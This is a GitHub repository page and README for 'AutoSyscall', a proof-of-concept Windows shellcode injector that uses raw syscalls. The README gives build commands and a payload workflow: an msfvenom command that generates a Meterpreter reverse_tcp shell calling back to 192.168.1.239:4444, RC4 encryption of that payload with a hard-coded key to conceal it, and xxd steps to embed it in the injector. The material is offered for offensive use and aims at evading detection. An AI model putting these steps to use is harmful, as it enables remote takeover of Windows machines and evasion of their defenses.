Skip to content
/ AutoSyscall Public
forked from bats3c/DefensiveInjector

Shellcode injector using direct syscalls

0 stars 35 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

blitztide/AutoSyscall

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
Images
Images
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
generate.py
generate.py
 
 
main.c
main.c
 
 
main.h
main.h
 
 
syscalls.asm
syscalls.asm
 
 

Repository files navigation

AutoSyscall

Screenshot

This library builds and makes a shellcode injector for all versions of Windows using raw syscalls.

This code is a PoC and has only been tested windows 10 x64 version 1909, this is because of the syscall numbers changing between versions, the values can be found here.

Install & Build

git clone https://github.com/bats3c/DefensiveInjector
cd DefensiveInjector
python generate.py
make _XP_SP2
make injector

The _XP_SP2 value is the define string for the shellcode.asm file, this will target specific versions of windows.

Using different shellcode

  • Generate your shellcode either with msfvenom or something else

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.239 LPORT=4444 -f raw -o meter.bin

  • Encrypt the shellcode

    Keeping in mind that if you change it here you will need to update the key on line 132 in main.c cat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin

  • Format the shellcode

    Run xxd -i encmeter.bin then replace everything between line 10-60 with the output

Dependencies

sudo apt install mingw-w64 nasm python

About

Shellcode injector using direct syscalls

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Assembly 96.5%
  • C 2.3%
  • Other 1.2%